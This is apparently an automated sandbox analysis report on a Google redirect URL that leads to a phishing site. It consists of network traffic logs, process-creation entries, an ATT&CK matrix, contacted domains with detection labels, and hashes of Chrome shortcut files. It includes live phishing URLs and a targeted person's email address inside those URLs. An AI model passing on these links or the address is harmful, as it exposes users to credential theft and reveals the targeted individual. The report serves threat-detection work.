Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 Jan 2025 15:13:24 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: classification engineClassification label: mal52.win@20/24@20/11
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1936,i,4928317751555499273,12545574023170528116,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.at/url?sa==60Pms7JnShWaY3TYp1tJfM6oLKC&rct=0GbqKUbKEUOA0yP6gBhAVbg0AlI6i1vFvwuOapuWmP7TbqjETP71sUvBq6eZihhNTt&sa=t&url=amp/growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20="
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1936,i,4928317751555499273,12545574023170528116,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://www.google.at/url?sa==60Pms7JnShWaY3TYp1tJfM6oLKC&rct=0GbqKUbKEUOA0yP6gBhAVbg0AlI6i1vFvwuOapuWmP7TbqjETP71sUvBq6eZihhNTt&sa=t&url=amp/growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20=0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://growingf8th.org/favicon.ico100%Avira URL Cloudphishing
https://rixolo.trilivar.ru/mwAdur/100%Avira URL Cloudphishing
https://rixolo.trilivar.ru/favicon.ico100%Avira URL Cloudphishing
NameIPActiveMaliciousAntivirus DetectionReputation
growingf8th.org
103.83.194.55
truefalse
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      code.jquery.com
      151.101.66.137
      truefalse
        high
        challenges.cloudflare.com
        104.18.95.41
        truefalse
          high
          rixolo.trilivar.ru
          104.21.33.3
          truetrue
            unknown
            www.google.com
            142.250.186.100
            truefalse
              high
              www.google.at
              216.58.206.67
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://a.nel.cloudflare.com/report/v4?s=Box6U4xdR9TgzUo88iY9QlyFAFrnbz447mwNzfTkbFmI7sIhUI8iNwtK%2B1KP8QbUj9u23mi81qn9kzXM9FBup1DahQBj7IqFkTk3QIRX2ntCdlQab0NS%2Bqgftq5MQQ%3D%3Dfalse
                  high
                  https://code.jquery.com/jquery-3.6.0.min.jsfalse
                    high
                    https://rixolo.trilivar.ru/mwAdur/#Wpate.rowell@cherokeebrick.comfalse
                      unknown
                      https://rixolo.trilivar.ru/mwAdur/true
                      • Avira URL Cloud: phishing
                      unknown
                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8fed21b6fd66c343/1736349209947/fec74b01aadc5e177f85ca6ea56ff1b6f476dfc786c37e6d5d0521cef9237b61/2J4z9yOx--AhckFfalse
                        high
                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                          high
                          https://challenges.cloudflare.com/turnstile/v0/g/849bfe45bf45/api.jsfalse
                            high
                            https://www.google.at/url?sa==60Pms7JnShWaY3TYp1tJfM6oLKC&rct=0GbqKUbKEUOA0yP6gBhAVbg0AlI6i1vFvwuOapuWmP7TbqjETP71sUvBq6eZihhNTt&sa=t&url=amp/growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20=false
                              high
                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fed21b6fd66c343&lang=autofalse
                                high
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8fed21b6fd66c343/1736349209949/chY3ZxDNJThTUgVfalse
                                  high
                                  https://rixolo.trilivar.ru/favicon.icofalse
                                  • Avira URL Cloud: phishing
                                  unknown
                                  http://growingf8th.org/favicon.icofalse
                                  • Avira URL Cloud: phishing
                                  unknown
                                  https://www.google.at/amp/growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20=false
                                    high
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1391608476:1736346727:knR3U4ghk5DvrWm8Z0ppO7GRdQqqvFtYvV0BfWnt7jY/8fed21b6fd66c343/uFX7jtvfVSbsLDHzd_D0mPynkmsoYGulVzTiO1UjW7I-1736349208-1.1.1.1-fY3TV0on5VPSwhpvLSt8Rd53gHoedzkoXnJBOIA.OPMrOb.ffVuX8nJLBMSvOmVRfalse
                                      high
                                      http://growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20=false
                                        unknown
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/kx1oo/0x4AAAAAAA4xQO3i_we8Fbpp/auto/fbE/normal/auto/false
                                          high
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          104.21.33.3
                                          rixolo.trilivar.ruUnited States
                                          13335CLOUDFLARENETUStrue
                                          216.58.206.67
                                          www.google.atUnited States
                                          15169GOOGLEUSfalse
                                          104.18.94.41
                                          unknownUnited States
                                          13335CLOUDFLARENETUSfalse
                                          103.83.194.55
                                          growingf8th.orgUnited States
                                          132335NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdINfalse
                                          104.18.95.41
                                          challenges.cloudflare.comUnited States
                                          13335CLOUDFLARENETUSfalse
                                          151.101.130.137
                                          unknownUnited States
                                          54113FASTLYUSfalse
                                          239.255.255.250
                                          unknownReserved
                                          unknownunknownfalse
                                          151.101.66.137
                                          code.jquery.comUnited States
                                          54113FASTLYUSfalse
                                          142.250.186.100
                                          www.google.comUnited States
                                          15169GOOGLEUSfalse
                                          35.190.80.1
                                          a.nel.cloudflare.comUnited States
                                          15169GOOGLEUSfalse
                                          IP
                                          192.168.2.5
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1586014
                                          Start date and time:2025-01-08 16:12:24 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 2m 54s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:browseurl.jbs
                                          Sample URL:https://www.google.at/url?sa==60Pms7JnShWaY3TYp1tJfM6oLKC&rct=0GbqKUbKEUOA0yP6gBhAVbg0AlI6i1vFvwuOapuWmP7TbqjETP71sUvBq6eZihhNTt&sa=t&url=amp/growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20=
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:7
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal52.win@20/24@20/11
                                          EGA Information:Failed
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 142.250.184.195, 64.233.184.84, 142.250.186.174, 142.250.184.206, 142.250.185.238, 142.250.185.174, 172.217.18.10, 142.250.186.42, 142.250.186.106, 142.250.74.202, 216.58.206.74, 172.217.16.202, 142.250.184.202, 142.250.185.170, 142.250.185.202, 142.250.186.74, 142.250.186.138, 142.250.185.138, 142.250.186.170, 142.250.185.106, 142.250.185.74, 142.250.184.234, 199.232.214.172, 192.229.221.95, 142.250.185.110, 172.217.18.14, 142.250.185.206, 142.250.185.163, 142.250.186.142, 199.232.210.172, 23.56.254.164, 20.12.23.50, 23.1.237.91, 13.107.246.45
                                          • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: https://www.google.at/url?sa==60Pms7JnShWaY3TYp1tJfM6oLKC&rct=0GbqKUbKEUOA0yP6gBhAVbg0AlI6i1vFvwuOapuWmP7TbqjETP71sUvBq6eZihhNTt&sa=t&url=amp/growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20=
                                          No simulations
                                          No context
                                          No context
                                          No context
                                          No context
                                          No context
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 14:13:18 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2677
                                          Entropy (8bit):3.982377263754845
                                          Encrypted:false
                                          SSDEEP:48:8RdwT0oQHbidAKZdA19ehwiZUklqehNy+3:8kvAuy
                                          MD5:71C597BC1008355EE16084116CD66D6D
                                          SHA1:765011A8499033A57D84EDF14E922D167D5E040E
                                          SHA-256:B3A6FE4B0AE97A0FC7FD15570738273BE51730148EE9056354104C404387E07A
                                          SHA-512:7F73E51CB5B810C58F3A62A8B2D364631F0E67832043BCC634ABAF727DD1D074FE991DC515BFF9D0CAA8910D4D691A05E7DD4DE82879FCF430A80C7F3F992ADA
                                          Malicious:false
                                          Reputation:low
                                          Preview:L..................F.@.. ...$+.,.........a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I(Z.y....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.y....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.y....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z.y..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.y...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 14:13:18 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2679
                                          Entropy (8bit):4.0011382933518815
                                          Encrypted:false
                                          SSDEEP:48:86dwT0oQHbidAKZdA1weh/iZUkAQkqehey+2:8Rv69Qvy
                                          MD5:4BBAD46388F2A7A2F3B615DF392EAE5B
                                          SHA1:7DC349B5E5ABAE21252A7D7F32CD951929AD8F68
                                          SHA-256:E1B9DD94FA5BE1D7D4FF46C2E775E7373C78BB4EE5AD2B9423274F96DB130BC6
                                          SHA-512:006507B8A05CF59704747530493586C3A8F4417FE4581570E665B38077B497EB8811FFA78EA949AC71DBED80900BF561374D1B85508581F7C2BB5AD97D681B37
                                          Malicious:false
                                          Reputation:low
                                          Preview:L..................F.@.. ...$+.,....'....a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I(Z.y....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.y....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.y....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z.y..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.y...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2693
                                          Entropy (8bit):4.0105986730467
                                          Encrypted:false
                                          SSDEEP:48:8xBdwT0osHbidAKZdA14tseh7sFiZUkmgqeh7sgy+BX:8xUvunCy
                                          MD5:B67E57E79D9A4EA2069598A14CF160FD
                                          SHA1:3F3DA2F5118A261A142C0E4E16C88858D93ED19C
                                          SHA-256:119E1126786B2216107F9BE6D8F373A9192EC78814201F95557C2ABD6D18E351
                                          SHA-512:FE7365003973983D015813B8687D5CF7BFBE210B45292BCB9093A6B58D0DCCF716665D5E1FDB4E626C48B3917793F0D66205B9FE83F757434021BFFEE1E2E24B
                                          Malicious:false
                                          Reputation:low
                                          Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I(Z.y....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.y....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.y....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z.y..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 14:13:18 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2681
                                          Entropy (8bit):4.000164937710397
                                          Encrypted:false
                                          SSDEEP:48:8xdwT0oQHbidAKZdA1vehDiZUkwqehKy+R:8Evhoy
                                          MD5:1B10DFEB117283E244137CF0FA233F4A
                                          SHA1:5608780E7F56AE4C24779654E19C17C0A56CAE10
                                          SHA-256:01DAC61C7128609407590EA128B699DC21ACC4DBD54F52E7B7F6D8AC8DAFEEF0
                                          SHA-512:01457D55AE1B5FA1A7DD30345135B14AC3CD702CEDC90E7EC777E147C4AC166EB1EC53F600F35BA1513C61F0A533F5620F772B76AA0649AAC16CD87941C8DF23
                                          Malicious:false
                                          Reputation:low
